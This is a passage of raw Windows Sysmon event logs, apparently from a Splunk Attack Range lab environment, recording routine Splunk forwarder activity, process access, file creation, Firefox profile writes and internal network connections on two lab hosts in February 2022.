Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C958E4C6567C99D7D168AA2EDD9817E,SHA256=B09F2EF49F917961F8C6C41F67A89EAA950BD7E9D15184215E1107D06A65A9E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:21.486{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69EA220AB25AF70DD477CEADADBB66AA,SHA256=A8B50CC5E754378AC917AAA2E75F40EFB5FD641E05BAA853948BF84ED68727C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.478{C8EA50B7-11E5-6216-2805-000000003802}67286732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11E5-6216-2805-000000003802}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-11E5-6216-2805-000000003802}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.140{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11E5-6216-2805-000000003802}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.011{C8EA50B7-11E5-6216-2805-000000003802}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000216916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:20.617{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51359-false10.0.1.12-8000- 23542300x8000000000000000216915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:22.486{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=213EBCCC751129C415E2F7952076971A,SHA256=29B37D1AA7C675593BEE3B9BF0FE399217003E40E560466C1790CE052BB8C916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED14E1FD18DF175E7AB7A05379C75AF,SHA256=673C234F70DCC2EF9EDFF2AECCD83CB19596A355158B315F1F2F16CDCDA7757E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.061{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11E5-6216-2905-000000003802}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-11E5-6216-2905-000000003802}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.040{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11E5-6216-2905-000000003802}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:21.894{C8EA50B7-11E5-6216-2905-000000003802}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000288975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:23.897{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D66980F96C986A7406D7266F3A601D6C,SHA256=702B74AA7F23C4F0990C10105CD87083683DC90838ECDC1329C12919E2E9E74F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:23.502{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07E33E7B62F823266680F3E76A1B25E5,SHA256=4A03D323BDCB9F116618A95BB381441343B97DDFE3FB7C8AA3C2FD98DBDFF2E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:24.984{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9485BD7B4954645D8B87E5A700FC58C,SHA256=C89D8B44B29B871088601D4AD0EB25CD115DE212164A7DBA033415DC0B22E46A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:24.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE94ECA0535AF1CB71B53E75CBF2CD9,SHA256=3A0C5A413FAADF720281F7EC386294E3F7A9DD9797E3AF9C81B7ACFF8C0DBA69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:24.968{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_ae555c0b-fd3b-46b4-b94f-5faf3e8e79d7.jsonMD5=35837DC9DD388ED86615F70A038B9675,SHA256=0F0D88C5E265FC9734402F98CC239AAF660137F34255DF9FF394784F44D76F04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:24.866{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\session-state.jsonMD5=87024576AA01B9B6D9596A5B65E52302,SHA256=6A152F8E9FA3E0B75F721381C4245565A2182090D07DB337316B0732E4AEE5D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:22.631{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53497-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:25.642{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=274C120C15D6732FCE868CCB54B613E1,SHA256=B0D0E8A905EC1C2C53C60786E435F94B7FBEAF359987A010D9F5740B1B50CBA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:26.642{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B118FBC5238DEDDC7E33AE5407DA332,SHA256=E6EB8C603419609ABA3C77EB08B89FAF42DA06246AA5160A055474F5FDD9A507,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:25.005{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54402- 354300x8000000000000000288992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:24.876{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56483- 10341000x8000000000000000288991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.469{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.469{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 